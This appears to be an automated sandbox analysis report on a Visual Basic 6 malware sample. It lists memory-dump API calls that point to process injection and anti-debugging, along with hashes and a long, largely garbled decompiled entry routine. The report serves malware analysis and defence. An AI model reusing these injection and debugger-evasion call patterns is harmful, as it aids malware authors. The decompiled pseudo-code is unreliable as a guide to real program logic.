                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0d78b2802d6162dd3bf2464ec3f5d95489a32fffcfc9c27be6405e5f4d42073c
                              • Instruction ID: 5cfe20cfe6a4c270f68edaf7c0d28380048649b0cc65903e131879ba66d1a6b5
                              • Opcode Fuzzy Hash: 0d78b2802d6162dd3bf2464ec3f5d95489a32fffcfc9c27be6405e5f4d42073c
                              • Instruction Fuzzy Hash: 05C144B5600346BBEB225FA4CD8579877A3EF82308F34C09CE9449B192C376D595CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa21cd9df7ed418c3fa57398891954fdda24e3235e09b1a1ce91d0726021285a
                              • Instruction ID: 63027ecada5cc16d2aea0e09b969d5e3670308401bf6ab5cdf9ffa55585855b9
                              • Opcode Fuzzy Hash: aa21cd9df7ed418c3fa57398891954fdda24e3235e09b1a1ce91d0726021285a
                              • Instruction Fuzzy Hash: 7D91F5B1740205AFFB255E64CD85BE83AA3EFC5704F74C169FE449A2D0CBB998C48B54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 02BC3297
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 04288211a0261a6d762d08d3ce8841100d2321533db635317677ca54c5e036f4
                              • Instruction ID: 3ad76bb57945839e71aaac6e5dc64e39b265c8c366c33ca8966b40a40ee0da86
                              • Opcode Fuzzy Hash: 04288211a0261a6d762d08d3ce8841100d2321533db635317677ca54c5e036f4
                              • Instruction Fuzzy Hash: 55A12675200789AFEB225F64CD857D87BA3EF9270CF64C089E9808A092D776D5D5CBC1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID:
                              • API String ID: 4046476035-0
                              • Opcode ID: dde95e2acfd6f2544eba8aaa9ac16bb0720cc94cb8ae645e53ff8d4c196302b0
                              • Instruction ID: a1ee09efe2de274a91f83ac7f5e9eec30847a1ceb3676948a3febfba07bbc1dd
                              • Opcode Fuzzy Hash: dde95e2acfd6f2544eba8aaa9ac16bb0720cc94cb8ae645e53ff8d4c196302b0
                              • Instruction Fuzzy Hash: BF9106781007CAEAC7166FADC965358B762EF13B5CF2895C9D150474A3E3319256CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 02BC3297
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 734cb950b26d81c38c27b41b819a4625f5e4cf536d5f45be07fcce03c529d82a
                              • Instruction ID: 3689b30769ea04861afe3501efa90b9e64f91e41414b9628a715f970a0972624
                              • Opcode Fuzzy Hash: 734cb950b26d81c38c27b41b819a4625f5e4cf536d5f45be07fcce03c529d82a
                              • Instruction Fuzzy Hash: 67710479200689BEDB279FA9CC8439877A3EF4230CF64D0C9E55486062D376D5D6CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 948b5c48222e6c4ad95480b19fe74e08a974e7171c2e7782375c1032772d1cd8
                              • Instruction ID: c6a931739a70d3cf13134da71636396c5d028050e4d3a92a36e869e5e8fb8a98
                              • Opcode Fuzzy Hash: 948b5c48222e6c4ad95480b19fe74e08a974e7171c2e7782375c1032772d1cd8
                              • Instruction Fuzzy Hash: F751843410068ACEDB275FACC618368B372EF53B58FA4A5DDD5508A465E3359885CFC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: ee2dab839e9cb1c3a12e445cd0abd5a3bf72b6d4141ae5dbb24548bd13892d33
                              • Instruction ID: 9c357ba167f6055629268dc28508d7ce0719096cce9acd2c0c0904aa39986599
                              • Opcode Fuzzy Hash: ee2dab839e9cb1c3a12e445cd0abd5a3bf72b6d4141ae5dbb24548bd13892d33
                              • Instruction Fuzzy Hash: 52512939240786EAD727AFAAD5493187762EF1370CF6854CDD06047463E372D6A6CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 8b8b3579f0bf6b5a88e8939f18e35643029905070c0bf860ff2fa0aec70e442e
                              • Instruction ID: 3a2be301c2232c9cd76b07f3f821a699f1d61d20601fafc692cfea5113029d53
                              • Opcode Fuzzy Hash: 8b8b3579f0bf6b5a88e8939f18e35643029905070c0bf860ff2fa0aec70e442e
                              • Instruction Fuzzy Hash: 5331F7306006098EEF2A6E68C9AC7E577B2EF56328FB946BDCD9587094D33484C5CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 4fcc14bc79118ec1aa82e7f12d175f1dc7e19872f6d080d082f014d59e870a07
                              • Instruction ID: 3902e7b6f2f57222e4b6caedc4a581c2852ead0416d987dca80168da6548a65d
                              • Opcode Fuzzy Hash: 4fcc14bc79118ec1aa82e7f12d175f1dc7e19872f6d080d082f014d59e870a07
                              • Instruction Fuzzy Hash: E621D5306006158EEF2A6E68C86C7A576B2EF46329FA946BDCD55870A4C334C4C4CF41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02BC76A9,00000040,02BC07FD,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 02BC7B51
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a42441fea43ff8b453d91700089c2a214c97c4c817970c86ca460e16e2081fb1
                              • Instruction ID: 60d4e1d9741b5a3095e7b2e466520dea8af5070dbbc7f03efdbb5b69ab402f7b
                              • Opcode Fuzzy Hash: a42441fea43ff8b453d91700089c2a214c97c4c817970c86ca460e16e2081fb1
                              • Instruction Fuzzy Hash: E6C012E02240002E68058A68CD48D2BB2AA8AD8A28B10C32CB832222CCC930EC048572
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaI4Var.MSVBVM60(?), ref: 0040DB37
                              • __vbaStrCopy.MSVBVM60 ref: 0040DB43
                              • __vbaI4Var.MSVBVM60(?), ref: 0040DB52
                              • __vbaLenBstr.MSVBVM60(?), ref: 0040DB60
                              • #632.MSVBVM60(?,?,00000000,?), ref: 0040DBBD
                              • __vbaStrVarVal.MSVBVM60(?,?), ref: 0040DBCB
                              • #516.MSVBVM60(00000000), ref: 0040DBD2
                              • #573.MSVBVM60(?,?), ref: 0040DBF4
                              • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0040DC0F
                              • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040DC16
                              • __vbaStrMove.MSVBVM60 ref: 0040DC20
                              • __vbaFreeStr.MSVBVM60 ref: 0040DC25
                              • __vbaFreeVarList.MSVBVM60(00000005,00000002,?,00000002,?,?), ref: 0040DC4A
                              • __vbaStrCat.MSVBVM60(?,0040C178), ref: 0040DC7B
                              • #650.MSVBVM60(?,0000000A,00000001,00000001,?,0040C178), ref: 0040DC97
                              • __vbaStrMove.MSVBVM60(?,0040C178), ref: 0040DCA1
                              • __vbaFreeVarList.MSVBVM60(00000002,00000008,0000000A,?,0040C178), ref: 0040DCAD
                              • __vbaFreeVar.MSVBVM60(0040DD09), ref: 0040DCF8
                              • __vbaFreeVar.MSVBVM60 ref: 0040DCFD
                              • __vbaFreeStr.MSVBVM60 ref: 0040DD02
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$Move$List$#516#573#632#650BstrCopy
                              • String ID: @Z@Z$Approvance7$Dernes8$Eminente7$FLJTESPILLERES$GENERALSTREJKENS$HYPAUTOMORPHIC$MAVEKNEBET$Menoplania$PDAGOGIKKERE$UFORSTANDIGHEDERS$Xs$abstort$anstdeliges$retsmders
                              • API String ID: 3299726966-3599177649
                              • Opcode ID: eb0265a4717498cbac98f82b4f71b09fbc8918a23123987427829c869ea325de
                              • Instruction ID: 5c26d3c9f5a76fd7195534f51019f2a06c89fa06f254f309d5fb61b063fb7e1a
                              • Opcode Fuzzy Hash: eb0265a4717498cbac98f82b4f71b09fbc8918a23123987427829c869ea325de
                              • Instruction Fuzzy Hash: 6953F775A00218DFDB24DF90CD88BDABBB5BB48301F1086EAE54AB7290DB745AC5CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 0041172B
                              • #663.MSVBVM60(?,0040C4D4,?,00000001,00000001), ref: 00411742
                              • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041175E
                              • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00411771
                              • __vbaFpI4.MSVBVM60 ref: 0041178A
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE78,00000064), ref: 004117A4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$#663CheckFreeHresultList
                              • String ID: 1-1-1
                              • API String ID: 3462652701-1550238906
                              • Opcode ID: cc634e36ab2d1ca5b999e065f365d04f10b2cd118a50263bd855a6a7a8ecea54
                              • Instruction ID: 8373eb978d944ea9264a1512d9571c8dc482ad0587d8bba55c3773d022d30a96
                              • Opcode Fuzzy Hash: cc634e36ab2d1ca5b999e065f365d04f10b2cd118a50263bd855a6a7a8ecea54
                              • Instruction Fuzzy Hash: 372168B5840258EFCB009F94DD89EEEBBB8FF54B00F04411AFA45B76A4D7B81548CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: W.E
                              • API String ID: 560597551-3845452836
                              • Opcode ID: fbfbc2507091aed7754518020be11994a5458c21c1e3b08758030e76db520434
                              • Instruction ID: 9bc5b1f270e5ba3fb1144cd03f4f0b954be60b18c3ede7469974485720ac59c1
                              • Opcode Fuzzy Hash: fbfbc2507091aed7754518020be11994a5458c21c1e3b08758030e76db520434
                              • Instruction Fuzzy Hash: DBA105391002C6EACB229FADC9193587762EF03B5CFB451C9D4949B4A3D335A492CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: _&
                              • API String ID: 1029625771-3206091340
                              • Opcode ID: e095beb9159cd8df26ad3524fbc8d198d32510da33e3cc9e26c433499bbe5afc
                              • Instruction ID: 19fea18b28b1a563ccec71e7f94c22839f9eeee2e58d171a311629b7a02a5c80
                              • Opcode Fuzzy Hash: e095beb9159cd8df26ad3524fbc8d198d32510da33e3cc9e26c433499bbe5afc
                              • Instruction Fuzzy Hash: 1D41B1791047CAEAC717AFAAD505218B762EF5374CB38A0C9D16047867D332D666CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 24%
                              			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, signed int __edi, intOrPtr* __esi) {
                              				signed int _t30;
                              				void* _t32;
                              				signed int _t33;
                              				signed int _t34;
                              				signed char _t36;
                              				signed int _t41;
                              				signed int _t49;
                              				intOrPtr* _t50;
                              				intOrPtr* _t52;
                              				void* _t54;
                              				void* _t55;
                              				void* _t56;
                              				void* _t57;
                              				signed int _t61;
                              				signed int _t64;
                              				void* _t71;
                              				void* _t74;
                              				signed int _t75;
                              				intOrPtr _t82;
                              				void* _t85;
                              				intOrPtr _t88;
                              
                              				_t61 = __edi;
                              				_t52 = __edx;
                              				_t50 = __ecx;
                              				_push("VB5!6&*"); // executed
                              				L004014BA(); // executed
                              				 *__eax =  *__eax + __eax;
                              				 *__eax =  *__eax + __eax;
                              				 *__eax =  *__eax + __eax;
                              				 *__eax =  *__eax ^ __eax;
                              				 *__eax =  *__eax + __eax;
                              				_t30 = __eax + 1;
                              				 *_t30 =  *_t30 + _t30;
                              				 *_t30 =  *_t30 + _t30;
                              				 *_t30 =  *_t30 + _t30;
                              				 *((intOrPtr*)(_t30 + 0x2a)) =  *((intOrPtr*)(_t30 + 0x2a)) + __ecx;
                              				goto 0x2a19a382;
                              				asm("wait");
                              				_pop(es);
                              				_t75 = _t30;
                              				asm("insb");
                              				_t64 = _t30;
                              				_pop(_t41);
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				_t32 = __esi - 1;
                              				 *_t64 =  *_t64 + _t32;
                              				_t33 = _t32 + 1;
                              				 *__ecx =  *__ecx + 0x50;
                              				if( *__ecx >= 0) {
                              					_push(0x65);
                              					asm("arpl [ebp+esi], si");
                              					 *_t33 =  *_t33 + _t33;
                              					 *((intOrPtr*)(_t33 + 0x307 + _t33 * 4)) =  *((intOrPtr*)(_t33 + 0x307 + _t33 * 4)) + __edx;
                              					 *_t33 =  *_t33 + _t33;
                              					L2:
                              					asm("int3");
                              					 *_t33 =  *_t33 ^ _t33;
                              					asm("adc al, 0xa1");
                              					asm("loop 0x27");
                              					_t49 = _t41 + _t41 + 1;
                              					asm("rcr ebp, 0x87");
                              					_t71 = _t71 + 1;
                              					asm("popfd");
                              					_pop(es);
                              					asm("repe into");
                              					asm("out 0xc3, al");
                              					_t75 =  *(_t64 + 0x42a39078) * 0x47;
                              					asm("repne push ss");
                              					asm("sbb [esi], bl");
                              					_t36 = _t52 -  *((intOrPtr*)(_t64 - 0x22)) & _t49;
                              					_t52 = 0x3a;
                              					_t61 = _t61 - 1;
                              					asm("lodsd");
                              					_t41 = _t49 ^  *(_t50 - 0x48ee309a);
                              					_t34 = _t36;
                              					asm("stosb");
                              					L3:
                              					 *((intOrPtr*)(_t34 - 0x2d)) =  *((intOrPtr*)(_t34 - 0x2d)) + _t34;
                              					_t33 = _t41;
                              					_t41 = _t34;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					if( *_t33 < 0) {
                              						goto L2;
                              					}
                              					 *_t33 =  *_t33 + _t33;
                              				}
                              				_t34 =  *0xe000000;
                              				 *((intOrPtr*)(_t34 + 0x4f)) =  *((intOrPtr*)(_t34 + 0x4f)) + _t50;
                              				_push(_t64);
                              				_push(_t52);
                              				_t61 = _t61 + 1;
                              				_t74 = _t71 + 3;
                              				_t75 = _t75 + 1 - 1;
                              				_push(_t34);
                              				_push(_t74);
                              				_t64 = _t64 - 1;
                              				_push(_t41);
                              				 *0x50000801 =  *0x50000801 + _t50;
                              				_t82 =  *0x50000801;
                              				asm("outsd");
                              				asm("insb");
                              				asm("gs outsb");
                              				if(_t82 < 0) {
                              					if (_t82 == 0) goto L7;
                              					asm("sbb [ecx], eax");
                              					 *_t52 =  *_t52 + _t34;
                              					 *(_t64 - 0x65) =  *(_t64 - 0x65) & _t61;
                              					 *_t34 =  *_t34 + _t34;
                              					asm("insb");
                              					if ( *_t34 == 0) goto L8;
                              					 *(_t64 - 0x65) =  *(_t64 - 0x65) + _t52;
                              					 *_t34 =  *_t34 + _t34;
                              					_t52 = _t52 + 1;
                              					_t71 = _t74 - 1;
                              					if(_t71 <= 0) {
                              						goto L3;
                              					} else {
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *[ss:eax] =  *[ss:eax] + _t34;
                              						 *_t34 =  *_t34 + _t50;
                              						 *_t34 =  *_t34 + _t34;
                              						 *((intOrPtr*)(_t34 - 0x76000000)) =  *((intOrPtr*)(_t34 - 0x76000000)) + _t52;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t50 =  *_t50 + _t34;
                              						 *_t34 =  *_t34 + _t52;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *((intOrPtr*)(_t34 - 0x65)) =  *((intOrPtr*)(_t34 - 0x65)) + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						asm("rol dword [eax], 0x0");
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						_t85 =  *_t34;
                              					}
                              				}
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
